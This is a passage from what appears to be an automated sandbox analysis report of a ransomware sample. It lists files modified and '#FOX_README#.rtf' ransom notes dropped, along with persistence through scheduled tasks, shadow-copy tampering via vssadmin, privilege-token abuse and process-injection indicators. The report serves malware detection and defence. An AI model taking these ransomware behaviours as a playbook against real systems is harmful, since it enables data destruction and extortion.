Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\an\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multiview.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Almaty f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\RepairInstall.mp4 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\WET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-sampler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Singapore f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-swing-tabcontrol.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\Logo.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Guam f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 288 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 940 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\WallpaperStyle = "0" reg.exe Key created \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\TileWallpaper = "0" reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1500 powershell.exe 1500 powershell.exe 1416 eSOQugH264.exe 1416 eSOQugH264.exe 1416 eSOQugH264.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 1416 eSOQugH264.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
description pid Process Token: SeDebugPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1416 eSOQugH264.exe Token: SeLoadDriverPrivilege 1416 eSOQugH264.exe Token: SeBackupPrivilege 1444 vssvc.exe Token: SeRestorePrivilege 1444 vssvc.exe Token: SeAuditPrivilege 1444 vssvc.exe Token: SeIncreaseQuotaPrivilege 676 WMIC.exe Token: SeSecurityPrivilege 676 WMIC.exe Token: SeTakeOwnershipPrivilege 676 WMIC.exe Token: SeLoadDriverPrivilege 676 WMIC.exe Token: SeSystemProfilePrivilege 676 WMIC.exe Token: SeSystemtimePrivilege 676 WMIC.exe Token: SeProfSingleProcessPrivilege 676 WMIC.exe Token: SeIncBasePriorityPrivilege 676 WMIC.exe Token: SeCreatePagefilePrivilege 676 WMIC.exe Token: SeBackupPrivilege 676 WMIC.exe Token: SeRestorePrivilege 676 WMIC.exe Token: SeShutdownPrivilege 676 WMIC.exe Token: SeDebugPrivilege 676 WMIC.exe Token: SeSystemEnvironmentPrivilege 676 WMIC.exe Token: SeRemoteShutdownPrivilege 676 WMIC.exe Token: SeUndockPrivilege 676 WMIC.exe Token: SeManageVolumePrivilege 676 WMIC.exe Token: 33 676 WMIC.exe Token: 34 676 WMIC.exe Token: 35 676 WMIC.exe Token: SeIncreaseQuotaPrivilege 676 WMIC.exe Token: SeSecurityPrivilege 676 WMIC.exe Token: SeTakeOwnershipPrivilege 676 WMIC.exe Token: SeLoadDriverPrivilege 676 WMIC.exe Token: SeSystemProfilePrivilege 676 WMIC.exe Token: SeSystemtimePrivilege 676 WMIC.exe Token: SeProfSingleProcessPrivilege 676 WMIC.exe Token: SeIncBasePriorityPrivilege 676 WMIC.exe Token: SeCreatePagefilePrivilege 676 WMIC.exe Token: SeBackupPrivilege 676 WMIC.exe Token: SeRestorePrivilege 676 WMIC.exe Token: SeShutdownPrivilege 676 WMIC.exe Token: SeDebugPrivilege 676 WMIC.exe Token: SeSystemEnvironmentPrivilege 676 WMIC.exe Token: SeRemoteShutdownPrivilege 676 WMIC.exe Token: SeUndockPrivilege 676 WMIC.exe Token: SeManageVolumePrivilege 676 WMIC.exe Token: 33 676 WMIC.exe Token: 34 676 WMIC.exe Token: 35 676 WMIC.exe Token: SeTakeOwnershipPrivilege 1192 takeown.exe Token: SeTakeOwnershipPrivilege 1496 takeown.exe Token: SeTakeOwnershipPrivilege 1456 takeown.exe Token: SeTakeOwnershipPrivilege 1492 takeown.exe Token: SeTakeOwnershipPrivilege 1116 takeown.exe -
Suspicious use of WriteProcessMemory 2070 IoCs
description pid Process procid_target PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 26 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 26 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 26 PID 1420 wrote to memory of 1672 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 26 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 28 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 28 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 28 PID 1420 wrote to memory of 1764 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 28 PID 1420 wrote to memory of 1364 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 33 PID 1420 wrote to memory of 1364 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 33 PID 1420 wrote to memory of 1364 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 33 PID 1420 wrote to memory of 1364 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 33 PID 1364 wrote to memory of 1500 1364 cmd.exe 35 PID 1364 wrote to memory of 1500 1364 cmd.exe 35 PID 1364 wrote to memory of 1500 1364 cmd.exe 35 PID 1364 wrote to memory of 1500 1364 cmd.exe 35 PID 1420 wrote to memory of 1000 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 36 PID 1420 wrote to memory of 1000 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 36 PID 1420 wrote to memory of 1000 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 36 PID 1420 wrote to memory of 1000 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 36 PID 1420 wrote to memory of 1340 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 37 PID 1420 wrote to memory of 1340 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 37 PID 1420 wrote to memory of 1340 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 37 PID 1420 wrote to memory of 1340 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 37 PID 1000 wrote to memory of 1144 1000 cmd.exe 40 PID 1000 wrote to memory of 1144 1000 cmd.exe 40 PID 1000 wrote to memory of 1144 1000 cmd.exe 40 PID 1000 wrote to memory of 1144 1000 cmd.exe 40 PID 1340 wrote to memory of 1548 1340 cmd.exe 41 PID 1340 wrote to memory of 1548 1340 cmd.exe 41 PID 1340 wrote to memory of 1548 1340 cmd.exe 41 PID 1340 wrote to memory of 1548 1340 cmd.exe 41 PID 1000 wrote to memory of 632 1000 cmd.exe 42 PID 1000 wrote to memory of 632 1000 cmd.exe 42 PID 1000 wrote to memory of 632 1000 cmd.exe 42 PID 1000 wrote to memory of 632 1000 cmd.exe 42 PID 1000 wrote to memory of 920 1000 cmd.exe 43 PID 1000 wrote to memory of 920 1000 cmd.exe 43 PID 1000 wrote to memory of 920 1000 cmd.exe 43 PID 1000 wrote to memory of 920 1000 cmd.exe 43 PID 1420 wrote to memory of 1084 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 44 PID 1420 wrote to memory of 1084 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 44 PID 1420 wrote to memory of 1084 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 44 PID 1420 wrote to memory of 1084 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 44 PID 1084 wrote to memory of 1224 1084 cmd.exe 47 PID 1084 wrote to memory of 1224 1084 cmd.exe 47 PID 1084 wrote to memory of 1224 1084 cmd.exe 47 PID 1084 wrote to memory of 1224 1084 cmd.exe 47 PID 1548 wrote to memory of 1728 1548 wscript.exe 48 PID 1548 wrote to memory of 1728 1548 wscript.exe 48 PID 1548 wrote to memory of 1728 1548 wscript.exe 48 PID 1548 wrote to memory of 1728 1548 wscript.exe 48 PID 1084 wrote to memory of 1460 1084 cmd.exe 50 PID 1084 wrote to memory of 1460 1084 cmd.exe 50 PID 1084 wrote to memory of 1460 1084 cmd.exe 50 PID 1084 wrote to memory of 1460 1084 cmd.exe 50 PID 1728 wrote to memory of 288 1728 cmd.exe 51 PID 1728 wrote to memory of 288 1728 cmd.exe 51 PID 1728 wrote to memory of 288 1728 cmd.exe 51 PID 1728 wrote to memory of 288 1728 cmd.exe 51 PID 1084 wrote to memory of 300 1084 cmd.exe 52 PID 1084 wrote to memory of 300 1084 cmd.exe 52 PID 1084 wrote to memory of 300 1084 cmd.exe 52 PID 1084 wrote to memory of 300 1084 cmd.exe 52 PID 300 wrote to memory of 316 300 cmd.exe 53 PID 300 wrote to memory of 316 300 cmd.exe 53 PID 300 wrote to memory of 316 300 cmd.exe 53 PID 300 wrote to memory of 316 300 cmd.exe 53 PID 316 wrote to memory of 1416 316 eSOQugH2.exe 54 PID 316 wrote to memory of 1416 316 eSOQugH2.exe 54 PID 316 wrote to memory of 1416 316 eSOQugH2.exe 54 PID 316 wrote to memory of 1416 316 eSOQugH2.exe 54 PID 1548 wrote to memory of 1116 1548 wscript.exe 55 PID 1548 wrote to memory of 1116 1548 wscript.exe 55 PID 1548 wrote to memory of 1116 1548 wscript.exe 55 PID 1548 wrote to memory of 1116 1548 wscript.exe 55 PID 1116 wrote to memory of 2016 1116 cmd.exe 57 PID 1116 wrote to memory of 2016 1116 cmd.exe 57 PID 1116 wrote to memory of 2016 1116 cmd.exe 57 PID 1116 wrote to memory of 2016 1116 cmd.exe 57 PID 1480 wrote to memory of 556 1480 taskeng.exe 59 PID 1480 wrote to memory of 556 1480 taskeng.exe 59 PID 1480 wrote to memory of 556 1480 taskeng.exe 59 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 61 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 61 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 61 PID 1420 wrote to memory of 1192 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 61 PID 556 wrote to memory of 940 556 cmd.exe 63 PID 556 wrote to memory of 940 556 cmd.exe 63 PID 556 wrote to memory of 940 556 cmd.exe 63 PID 1192 wrote to memory of 848 1192 cmd.exe 64 PID 1192 wrote to memory of 848 1192 cmd.exe 64 PID 1192 wrote to memory of 848 1192 cmd.exe 64 PID 1192 wrote to memory of 848 1192 cmd.exe 64 PID 1192 wrote to memory of 1764 1192 cmd.exe 65 PID 1192 wrote to memory of 1764 1192 cmd.exe 65 PID 1192 wrote to memory of 1764 1192 cmd.exe 65 PID 1192 wrote to memory of 1764 1192 cmd.exe 65 PID 1192 wrote to memory of 1828 1192 cmd.exe 66 PID 1192 wrote to memory of 1828 1192 cmd.exe 66 PID 1192 wrote to memory of 1828 1192 cmd.exe 66 PID 1192 wrote to memory of 1828 1192 cmd.exe 66 PID 1828 wrote to memory of 1000 1828 cmd.exe 67 PID 1828 wrote to memory of 1000 1828 cmd.exe 67 PID 1828 wrote to memory of 1000 1828 cmd.exe 67 PID 1828 wrote to memory of 1000 1828 cmd.exe 67 PID 1192 wrote to memory of 436 1192 cmd.exe 68 PID 1192 wrote to memory of 436 1192 cmd.exe 68 PID 1192 wrote to memory of 436 1192 cmd.exe 68 PID 1192 wrote to memory of 436 1192 cmd.exe 68 PID 1420 wrote to memory of 1456 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 70 PID 1420 wrote to memory of 1456 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 70 PID 1420 wrote to memory of 1456 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 70 PID 1420 wrote to memory of 1456 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 70 PID 1456 wrote to memory of 1728 1456 cmd.exe 73 PID 1456 wrote to memory of 1728 1456 cmd.exe 73 PID 1456 wrote to memory of 1728 1456 cmd.exe 73 PID 1456 wrote to memory of 1728 1456 cmd.exe 73 PID 1456 wrote to memory of 1428 1456 cmd.exe 74 PID 1456 wrote to memory of 1428 1456 cmd.exe 74 PID 1456 wrote to memory of 1428 1456 cmd.exe 74 PID 1456 wrote to memory of 1428 1456 cmd.exe 74 PID 1456 wrote to memory of 1628 1456 cmd.exe 75 PID 1456 wrote to memory of 1628 1456 cmd.exe 75 PID 1456 wrote to memory of 1628 1456 cmd.exe 75 PID 1456 wrote to memory of 1628 1456 cmd.exe 75 PID 1628 wrote to memory of 2012 1628 cmd.exe 76 PID 1628 wrote to memory of 2012 1628 cmd.exe 76 PID 1628 wrote to memory of 2012 1628 cmd.exe 76 PID 1628 wrote to memory of 2012 1628 cmd.exe 76 PID 1456 wrote to memory of 1900 1456 cmd.exe 77 PID 1456 wrote to memory of 1900 1456 cmd.exe 77 PID 1456 wrote to memory of 1900 1456 cmd.exe 77 PID 1456 wrote to memory of 1900 1456 cmd.exe 77 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 78 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 78 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 78 PID 1420 wrote to memory of 608 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 78 PID 608 wrote to memory of 1568 608 cmd.exe 80 PID 608 wrote to memory of 1568 608 cmd.exe 80 PID 608 wrote to memory of 1568 608 cmd.exe 80 PID 608 wrote to memory of 1568 608 cmd.exe 80 PID 608 wrote to memory of 576 608 cmd.exe 81 PID 608 wrote to memory of 576 608 cmd.exe 81 PID 608 wrote to memory of 576 608 cmd.exe 81 PID 608 wrote to memory of 576 608 cmd.exe 81 PID 608 wrote to memory of 912 608 cmd.exe 82 PID 608 wrote to memory of 912 608 cmd.exe 82 PID 608 wrote to memory of 912 608 cmd.exe 82 PID 608 wrote to memory of 912 608 cmd.exe 82 PID 912 wrote to memory of 800 912 cmd.exe 83 PID 912 wrote to memory of 800 912 cmd.exe 83 PID 912 wrote to memory of 800 912 cmd.exe 83 PID 912 wrote to memory of 800 912 cmd.exe 83 PID 608 wrote to memory of 1576 608 cmd.exe 84 PID 608 wrote to memory of 1576 608 cmd.exe 84 PID 608 wrote to memory of 1576 608 cmd.exe 84 PID 608 wrote to memory of 1576 608 cmd.exe 84 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 85 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 85 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 85 PID 1420 wrote to memory of 1308 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 85 PID 1308 wrote to memory of 1192 1308 cmd.exe 87 PID 1308 wrote to memory of 1192 1308 cmd.exe 87 PID 1308 wrote to memory of 1192 1308 cmd.exe 87 PID 1308 wrote to memory of 1192 1308 cmd.exe 87 PID 1308 wrote to memory of 676 1308 cmd.exe 88 PID 1308 wrote to memory of 676 1308 cmd.exe 88 PID 1308 wrote to memory of 676 1308 cmd.exe 88 PID 1308 wrote to memory of 676 1308 cmd.exe 88 PID 1308 wrote to memory of 1844 1308 cmd.exe 89 PID 1308 wrote to memory of 1844 1308 cmd.exe 89 PID 1308 wrote to memory of 1844 1308 cmd.exe 89 PID 1308 wrote to memory of 1844 1308 cmd.exe 89 PID 1844 wrote to memory of 1876 1844 cmd.exe 90 PID 1844 wrote to memory of 1876 1844 cmd.exe 90 PID 1844 wrote to memory of 1876 1844 cmd.exe 90 PID 1844 wrote to memory of 1876 1844 cmd.exe 90 PID 1308 wrote to memory of 1340 1308 cmd.exe 91 PID 1308 wrote to memory of 1340 1308 cmd.exe 91 PID 1308 wrote to memory of 1340 1308 cmd.exe 91 PID 1308 wrote to memory of 1340 1308 cmd.exe 91 PID 1420 wrote to memory of 1628 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 92 PID 1420 wrote to memory of 1628 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 92 PID 1420 wrote to memory of 1628 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 92 PID 1420 wrote to memory of 1628 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 92 PID 1628 wrote to memory of 340 1628 cmd.exe 94 PID 1628 wrote to memory of 340 1628 cmd.exe 94 PID 1628 wrote to memory of 340 1628 cmd.exe 94 PID 1628 wrote to memory of 340 1628 cmd.exe 94 PID 1628 wrote to memory of 1916 1628 cmd.exe 95 PID 1628 wrote to memory of 1916 1628 cmd.exe 95 PID 1628 wrote to memory of 1916 1628 cmd.exe 95 PID 1628 wrote to memory of 1916 1628 cmd.exe 95 PID 1628 wrote to memory of 1536 1628 cmd.exe 96 PID 1628 wrote to memory of 1536 1628 cmd.exe 96 PID 1628 wrote to memory of 1536 1628 cmd.exe 96 PID 1628 wrote to memory of 1536 1628 cmd.exe 96 PID 1536 wrote to memory of 1568 1536 cmd.exe 97 PID 1536 wrote to memory of 1568 1536 cmd.exe 97 PID 1536 wrote to memory of 1568 1536 cmd.exe 97 PID 1536 wrote to memory of 1568 1536 cmd.exe 97 PID 1628 wrote to memory of 1764 1628 cmd.exe 98 PID 1628 wrote to memory of 1764 1628 cmd.exe 98 PID 1628 wrote to memory of 1764 1628 cmd.exe 98 PID 1628 wrote to memory of 1764 1628 cmd.exe 98 PID 1420 wrote to memory of 1856 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 99 PID 1420 wrote to memory of 1856 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 99 PID 1420 wrote to memory of 1856 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 99 PID 1420 wrote to memory of 1856 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 99 PID 1856 wrote to memory of 1928 1856 cmd.exe 101 PID 1856 wrote to memory of 1928 1856 cmd.exe 101 PID 1856 wrote to memory of 1928 1856 cmd.exe 101 PID 1856 wrote to memory of 1928 1856 cmd.exe 101 PID 1856 wrote to memory of 2000 1856 cmd.exe 102 PID 1856 wrote to memory of 2000 1856 cmd.exe 102 PID 1856 wrote to memory of 2000 1856 cmd.exe 102 PID 1856 wrote to memory of 2000 1856 cmd.exe 102 PID 1856 wrote to memory of 1744 1856 cmd.exe 103 PID 1856 wrote to memory of 1744 1856 cmd.exe 103 PID 1856 wrote to memory of 1744 1856 cmd.exe 103 PID 1856 wrote to memory of 1744 1856 cmd.exe 103 PID 1744 wrote to memory of 288 1744 cmd.exe 104 PID 1744 wrote to memory of 288 1744 cmd.exe 104 PID 1744 wrote to memory of 288 1744 cmd.exe 104 PID 1744 wrote to memory of 288 1744 cmd.exe 104 PID 1856 wrote to memory of 1992 1856 cmd.exe 105 PID 1856 wrote to memory of 1992 1856 cmd.exe 105 PID 1856 wrote to memory of 1992 1856 cmd.exe 105 PID 1856 wrote to memory of 1992 1856 cmd.exe 105 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 106 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 106 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 106 PID 1420 wrote to memory of 668 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 106 PID 668 wrote to memory of 1392 668 cmd.exe 108 PID 668 wrote to memory of 1392 668 cmd.exe 108 PID 668 wrote to memory of 1392 668 cmd.exe 108 PID 668 wrote to memory of 1392 668 cmd.exe 108 PID 668 wrote to memory of 744 668 cmd.exe 109 PID 668 wrote to memory of 744 668 cmd.exe 109 PID 668 wrote to memory of 744 668 cmd.exe 109 PID 668 wrote to memory of 744 668 cmd.exe 109 PID 668 wrote to memory of 1492 668 cmd.exe 110 PID 668 wrote to memory of 1492 668 cmd.exe 110 PID 668 wrote to memory of 1492 668 cmd.exe 110 PID 668 wrote to memory of 1492 668 cmd.exe 110 PID 1492 wrote to memory of 632 1492 cmd.exe 111 PID 1492 wrote to memory of 632 1492 cmd.exe 111 PID 1492 wrote to memory of 632 1492 cmd.exe 111 PID 1492 wrote to memory of 632 1492 cmd.exe 111 PID 668 wrote to memory of 656 668 cmd.exe 112 PID 668 wrote to memory of 656 668 cmd.exe 112 PID 668 wrote to memory of 656 668 cmd.exe 112 PID 668 wrote to memory of 656 668 cmd.exe 112 PID 1420 wrote to memory of 1628 1420 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe 113 PID 1420 wrote to memory of 1628 1420 